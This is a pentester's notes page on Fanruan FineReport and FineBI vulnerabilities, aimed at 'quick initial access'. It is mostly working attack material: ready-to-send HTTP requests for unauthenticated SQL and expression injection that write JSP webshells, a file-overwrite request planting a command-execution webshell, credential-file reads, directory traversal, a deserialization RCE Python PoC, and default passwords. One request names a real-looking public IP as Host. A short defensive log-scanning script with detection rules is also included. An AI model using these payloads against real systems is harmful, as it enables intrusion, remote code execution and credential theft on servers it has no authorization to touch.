Common Fanruan Vulnerabilities

Fanruan Report: quick initial access

https://mp.weixin.qq.com/s/e3vFVmiZ25wSWtw2AYXBsA

https://mp.weixin.qq.com/s/AgMYcyq_TE4X8MvZ7cjiPQ

https://mp.weixin.qq.com/s/gQGkMk8U89RSqzfSa2vtsg

Common fingerprints

title="数据决策系统" || body="FineReport" || body="ReportServer?op=resource"
    || body="/webroot/decision" || body="/WebReport/ReportServer?" || body="/webroot/decision/file?path="
    || body="/decision/file?path="

Information gathering

The Fanruan version number can be viewed at either of the following two paths:

/webroot/decision/system/info
/decision/system/info

/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}

/decision/view/ReportServer?test=s&n=${ENV_HOME}

Both requests reveal the system's absolute path.

Unauthenticated vulnerabilities

Fanruan Excel SQL injection

Affected versions:

FineReport < 11.5.4.1

FineBi 7.0.* < 7.0.5

FineBi 6.1.* < 6.1.8

FineBi 6.0.* < 6.0.24

FineDataLink 5.0.* < 5.0.4.3

FineDataLink 4.0.* < 4.2.11.3

POST /decision/ReportServer HTTP/1.1
Host: 218.90.225.215
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

op=getSessionID&viewlets=[5b]{'reportlet':'/'}[5d]&

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7B%22p%22%3A%7B%22x%22%3A2%7D%7D&__parameters__=%7B%7D HTTP/1.1
Host: 192.168.187.134:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Params: <pd>
 <LargeDatasetExcelExportJS dsName="1">
<Parameters><Parameter>
<Attributes name="p"/>
<O t="Formula"><Attributes><![CDATA[sql('FRDemo',CONCATENATE("pr","agm","a wr","i","t","a","ble","_sch","e","ma=o","n"),1)-sql('FRDemo',CONCATENATE("dele","t","e f","r","o","m sq","li","t","e_sc","he","ma w","here"," na","m","e!","=","'s","ql","ite","_s","ta","t","1'"),1)-sql('FRDemo',CONCATENATE("an","aly","ze"),1)-sql('FRDemo',CONCATENATE("re","p","lac","e i","nto"," s","ql","ite_","st","at","1 va","lu","es('","'","'<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer(\"Zjc5NjUxODQ4NDAyY2JmZmI3MWNmNGMwYWYyNzU0NzE=\"))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>", "'","',''"),"")),1)-sql('FRDemo',CONCATENATE("V","A","C","U","U","M"," i","nt","o(''",ENV_HOME,"/",".",".","/",".","/","console",".","j","s","p","')"),1)]]></Attributes></O>
</Parameter></Parameters>
</LargeDatasetExcelExportJS>
</pd>
Sessionid: 76fe07c3-6b88-4d57-8f19-d415d6db379a
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

V8.0: reading usernames and passwords

/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

erick
___0022007c0039003b005100e3     // ciphertext; the plaintext is 123456

Directory traversal

/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../..&currentUserName=admin&currentUserId=1&isWebReport=true

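Data Decision System v9.0 arbitrary file overwrite vulnerability (getshell)

Tip: this achieves RCE by overwriting a file, so the target file must actually exist; after installation, WebReport V9 has update.jsp and update1.jsp in the WebReport directory.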

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 95

{"__CONTENT__":"<% out.print(\"hello\"); %>","__CHARSET__":"UTF-8"}

xxxx/WebReport/update.jsp
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675

{"__CONTENT__":"<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}%>","__CHARSET__":"UTF-8"}

Fanruan unauthenticated getshell

https://y4tacker.github.io/2024/07/23/year/2024/7/%E6%9F%90%E8%BD%AFReport%E9%AB%98%E7%89%88%E6%9C%AC%E4%B8%AD%E5%88%A9%E7%94%A8%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%86%E8%8A%82/

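Verification script: determines whether the target has the expression injection; a 302 response means the vulnerability is very likely present.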
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFSELECT%201%3B',1,1))}

/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}   // get the absolute path
// write a file

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('ATTACH%09DATABASE%20%27%2Fbi%2Fxqiao_bi%2Fwebapps%2Fwebroot%2Fhelp%2Fhello.jsp%27%20AS%20xxxx%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('CREATE%09TABLE%20xxxx.exp%28data%20text%29%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('INSERT%09INTO%20xxxx.exp%28data%29%20VALUES%20%28%27%3c%25%20out.print%28%22hello%22%29%3b%25%3e%27%29%3B',1,1))} HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Connection: close

https://mp.weixin.qq.com/s/AliftiLevjz5HB9uL0DOqQ (bypass for newer Fanruan versions)

GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B',1,1))} HTTP/1.1
Host: target.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

Fanruan PDF interface remote command execution vulnerability

GET /decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: */*
Referer: http:///decision/view/ReportServer?test=s&n=${ENV_HOME}
sessionID: ${7*9}
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host: {{TARGET}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: */*
sessionID: ${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH DATABASE ''../webapps/webroot/test.txt'' AS t;CREATE TABLE t.d(data VARCHAR(255));INSERT INTO t.d(data) VALUES (''FineReport RCE Test - Success!'');'))}
Connection: close

Fanruan channel deserialization

POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host: 
cmd: id
Connection: close

{{gzip(file(fine10.bin))}}

Vulnerability PoC

import requests
import sys

# Check the number of arguments
if len(sys.argv) < 3:
    print("Usage: python3 poc.py <target_url> <command> [proxy_url]")
    print("Example: python3 poc.py http://192.168.1.100 whoami http://127.0.0.1:8080")
    sys.exit(1)

url = sys.argv[1].rstrip('/')  # automatically strip a trailing slash
cmd = sys.argv[2]

# Optional: the third argument is a proxy
proxies = None
if len(sys.argv) > 3:
    proxy_url = sys.argv[3]
    proxies = {
        'http': proxy_url,
        'https': proxy_url
    }

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0',
    'cmd': cmd
}

target_url = url + "/webroot/decision/remote/design/channel"

data = b'...'  # gzip-compressed contents of fine10.bin, as in the raw request above

# Send the request
try:
    resp = requests.post(
        target_url,
        data=data,
        headers=headers,
        proxies=proxies,
        verify=False,  # skip SSL certificate verification
        timeout=15
    )
    print(resp.text)
except Exception as e:
    print(f"[ERROR] {e}")
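
A defensive counterpart to the requests listed above, added here as an example and not taken from the original post: an access-log triage script that flags the URL patterns this page documents. The combined log format, the rule names, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line (the format is an assumption).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Rule name -> pattern, applied to the URL-decoded, lower-cased request target.
# Lookaheads keep the rules independent of query-parameter order.
RULES = {name: re.compile(rx, re.S) for name, rx in {
    "expression-injection": r"reportserver\?(?:.*&)?n=[^&]*\$\{",
    "sqlite-file-write": r"sql\(.*?(?:attach\s+database|vacuum\s+into)",
    "svg-file-overwrite": r"(?=.*cmd=design_save_svg)(?=.*filepath=[^&]*\.\./)",
    "directory-traversal": r"(?=.*cmd=design_list_file)(?=.*file_path=[^&]*\.\.)",
    "privilege-xml-read": r"(?=.*cmd=get_geo_json)(?=.*resourcepath=[^&]*privilege\.xml)",
}.items()}

def classify(line):
    """Return the names of the rules that one access-log line matches."""
    m = REQUEST.search(line)
    if m is None:
        return []
    target = unquote(unquote(m["target"])).lower()  # twice: double-encoded input
    hits = [name for name, rx in RULES.items() if rx.search(target)]
    # The deserialization request is a POST whose body never reaches the log.
    if m["method"] == "POST" and target.split("?")[0].endswith("/remote/design/channel"):
        hits.append("design-channel-post")
    return hits

def scan(lines):
    """Map each client address to the set of rules its requests triggered."""
    report = {}
    for line in lines:
        hits = classify(line)
        if hits:
            report.setdefault(line.split()[0], set()).update(hits)
    return report

# Constructed sample lines: documentation addresses, shortened inert payloads.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Dec/2025:10:00:01 +0800] "GET /webroot/decision/view/ReportServer?test=s&n=$%7BENV_HOME%7D HTTP/1.1" 200 64',
    '203.0.113.7 - - [30/Dec/2025:10:00:05 +0800] "GET /webroot/decision/view/ReportServer?test=s&n=%24%7B__fr_locale__%3Dsql(%27FRDemo%27,DECODE(%27ATTACH%2509DATABASE%2520x%27,1,1))%7D HTTP/1.1" 302 0',
    '203.0.113.7 - - [30/Dec/2025:10:00:09 +0800] "POST /WebReport/ReportServer?op=svginit&filePath=chartmapsvg/../../x.jsp&cmd=design_save_svg HTTP/1.1" 200 0',
    '203.0.113.7 - - [30/Dec/2025:10:00:12 +0800] "POST /webroot/decision/remote/design/channel HTTP/1.1" 200 0',
    '198.51.100.4 - - [30/Dec/2025:10:01:00 +0800] "GET /webroot/decision/login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, sorted(hits))
```

The Excel-export and PDF-print requests shown earlier carry their payload in the Params and sessionID headers, which a default access log does not record; catching those needs header logging or a rule at the reverse proxy or WAF.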

Default usernames and passwords

Abby Anna Alice Ben Billy Cherry demo eoco hanwen
Jack Jenny Lily Lisa Mike sunlin Tom wangwei zhangshan erick

password1/123456

https://help.fanruan.com/finebi/

By Lsec
Last updated on Dec 30, 2025 15:26 +0800